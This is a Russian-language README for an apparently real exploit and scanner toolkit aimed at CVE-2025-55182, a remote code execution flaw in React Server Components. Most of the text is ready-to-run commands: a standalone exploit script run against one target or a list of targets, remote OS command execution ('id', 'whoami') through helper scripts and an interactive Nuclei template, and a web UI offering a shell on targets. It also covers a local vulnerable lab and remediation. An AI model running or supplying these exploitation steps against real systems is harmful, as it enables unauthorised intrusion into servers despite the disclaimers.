
Комплексный набор инструментов для проверки безопасности CVE-2025-55182 — критической уязвимости удалённого выполнения кода без аутентификации в React Server Components.
Хотите понять эту уязвимость на 100%?
📖 Прочитайте наш полный технический анализ — всё, что вам нужно знать:
- Почему React работает на сервере (а не только в браузере!)
- Как работает атака с наглядными схемами
- Каждая строка эксплойта объяснена
- От базовых понятий до продвинутой эксплуатации
- Никаких предварительных требований!
Идеально подходит для: отчетов по безопасности, учебных материалов, анализа угроз или просто для обучения!
Эта уязвимость затрагивает версии React Server Components с 19.0.0 по 19.2.0, влияя на:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpackВоздействие: Неаутентифицированные злоумышленники могут удалённо выполнять произвольный код через небезопасную десериализацию HTTP-запросов к конечным точкам Server Functions.
👉 Прочитайте полный технический анализ — исчерпывающее руководство, охватывающее:
Идеально подходит для:
Предварительные знания не требуются — начинается с основ и переходит к продвинутым техникам эксплуатации!
ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ
Этот инструмент предназначен исключительно для:
Предупреждение: Несанкционированный доступ к компьютерным системам незаконен. Пользователи несут ответственность за соблюдение всех применимых законов и нормативных актов. Авторы не несут ответственности за неправомерное использование этого инструмента.
Никаких зависимостей не требуется! Один bash-скрипт для быстрого тестирования.
👉 EXPLOIT_SCRIPT.md — автономный скрипт, который:
# Одна цель
./exploit-cve-2025-55182.sh http://target.com
# Несколько целей
./exploit-cve-2025-55182.sh -f targets.txt
Полный набор инструментов с Docker, веб-интерфейсом и интеграцией Nuclei. Продолжайте чтение ниже для установки.
Выберите свой метод установки:
# Клонирование репозитория
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Запуск сканера
docker compose up
# Доступ к веб-интерфейсу по адресу http://localhost:3001
# Клонирование репозитория
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Установка Nuclei (macOS)
brew install nuclei
# Назначение прав на выполнение скриптов
chmod +x scripts/*.sh
📖 Подробная настройка: См. SETUP_GUIDE.md для пошаговых инструкций
⚡ Краткий справочник: См. QUICKSTART.md для типовых сценариев использования
Запуск веб-интерфейса:
docker compose up
# Откройте браузер: http://localhost:3001
Запуск с уязвимым тестовым приложением:
docker compose --profile with-vulnerable-app up
# Сканер: http://localhost:3001
# Уязвимое приложение: http://localhost:3000
Важно для пользователей Docker: При сканировании из Docker используйте:
http://host.docker.internal:3000 для сканирования приложений на вашем основном компьютереhttp://vulnerable-app:3000 для сканирования контейнеризированного уязвимого приложенияhttps://example.com для внешних целейhttp://localhost:3001Создайте и протестируйте локальное уязвимое приложение:
# Терминал 1: Запуск уязвимого приложения
./scripts/setup-vulnerable-app.sh
# Приложение будет работать по адресу http://localhost:3000
# Терминал 2: Проверка
./scripts/test-local.sh
# Выполнение пользовательских команд
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Базовое сканирование
./scripts/test-remote.sh https://target.com
# С выполнением команды
./scripts/test-remote.sh https://target.com "id"
# Создание файла с целями
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Сканирование всех целей
./scripts/test-multiple.sh targets.txt
Базовое обнаружение уязвимости:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
Выполнение пользовательских команд:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v
Сканирование нескольких целей:
nuclei -t templates/cve-2025-55182.yaml -l targets.txt -v
CVE-2025-55182-Scanner/
├── README.md # Основная документация
├── EXPLOIT_SCRIPT.md # Руководство по автономному скрипту
├── QUICKSTART.md # Руководство по быстрому старту
├── SETUP_GUIDE.md # Подробные инструкции по установке
├── LICENSE # Лицензия MIT
│
├── exploit-cve-2025-55182.sh # Автономный эксплойт-скрипт
│
├── Dockerfile # Конфигурация Docker
├── docker-compose.yml # Настройка Docker Compose
│
├── templates/ # Шаблоны Nuclei
│ ├── cve-2025-55182.yaml # Шаблон обнаружения
│ └── cve-2025-55182-interactive.yaml # Интерактивный шаблон RCE
│
├── scripts/ # Вспомогательные скрипты
│ ├── setup-vulnerable-app.sh # Настройка локального уязвимого приложения
│ ├── test-local.sh # Тестирование локального экземпляра
│ ├── test-remote.sh # Тестирование удалённой цели
│ └── test-multiple.sh # Тестирование нескольких целей
│
├── web-ui/ # Веб-интерфейс
│ ├── server.js # Сервер Express
│ ├── package.json # Зависимости
│ └── public/
│ └── index.html # Фронтенд
│
├── vulnerable-app/ # Уязвимое тестовое приложение (сгенерировано)
│ ├── Dockerfile # Конфигурация Docker
│ └── ...
│
└── docs/ # 📚 Документация
├── TECHNICAL.md # ⭐ ПОЛНОЕ руководство по уязвимости
│ # - Как это работает (от основ до продвинутого)
│ # - Процесс атаки со схемами
│ # - Анализ полезной нагрузки (объяснение каждой строки)
│ # - Обнаружение и предотвращение
│ # - Реальные примеры
└── REMEDIATION.md # Инструкции по устранению
docs/TECHNICAL.md ⭐ Самый полный ресурс
Уязвимость возникает из-за небезопасной десериализации в React Server Components. Злоумышленники могут:
child_processХотите понять, КАК ИМЕННО это работает?
👉 Полный технический разбор — docs/TECHNICAL.md
Это исчерпывающее руководство включает:
✅ Почему React Server Components работают на сервере (а не в браузере)
✅ Как работает прототипное загрязнение в JavaScript
✅ Пошаговый процесс атаки с наглядными схемами
✅ Каждый байт полезной нагрузки эксплойта объяснён
✅ Как злоумышленники получают выполнение кода из JSON
✅ Реальные примеры доказательных концепций (PoC)
✅ Методы обнаружения и стратегии предотвращения
Написано простым языком — учёная степень не требуется! От «основ React» до «полной эксплуатации» в одном документе.
Идеально подходит для:
Если вы используете уязвимую версию:
Полное руководство: docs/REMEDIATION.md — все шаги по устранению уязвимости
🎓 Полный технический анализ — наше исчерпывающее руководство
Почему стоит прочитать наше техническое руководство?
Используется: специалистами по безопасности, разработчиками, пентестерами и преподавателями по всему миру.
Вклад приветствуется! Чтобы внести свой вклад:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)Этот проект лицензирован под лицензией MIT — подробности см. в файле LICENSE.
StealthMoud
Если вы нашли этот инструмент полезным, пожалуйста, ⭐ поставьте звезду этому репозиторию в знак поддержки!
Подпишитесь на этот репозиторий, чтобы получать обновления и новые функции.
Этот инструмент выпущен, чтобы помочь специалистам по безопасности выявлять и устранять уязвимые системы. Всегда:
✅ Получайте явное письменное разрешение перед тестированием
✅ Ответственно сообщайте о находках затронутым сторонам
✅ Соблюдайте все применимые законы и нормативные акты
❌ Никогда не используйте этот инструмент для несанкционированного доступа
❌ Никогда не используйте этот инструмент в злонамеренных целях
Помните: Несанкционированный доступ к компьютерам — это преступление. Тестируйте ответственно.
| Возможность | Описание |
|---|
| 🐳 Поддержка Docker | Развертывание одной командой с Docker Compose |
| 🌐 Веб-интерфейс | Удобный веб-интерфейс для нетехнических пользователей |
| 🔍 Уязвимая тестовая среда | Запуск локального уязвимого приложения для безопасного тестирования |
| 🎯 Удалённое сканирование | Проверка внешних целей на уязвимость |
| ⚡ Интерактивная оболочка | Выполнение OS-команд и просмотр результатов в реальном времени |
| 📊 Несколько режимов сканирования | Только обнаружение или полная эксплуатация |
| 📝 Подробные отчёты | Форматы вывода JSON и текст |
| 🔧 Интеграция Nuclei | Использование мощного сканера ProjectDiscovery |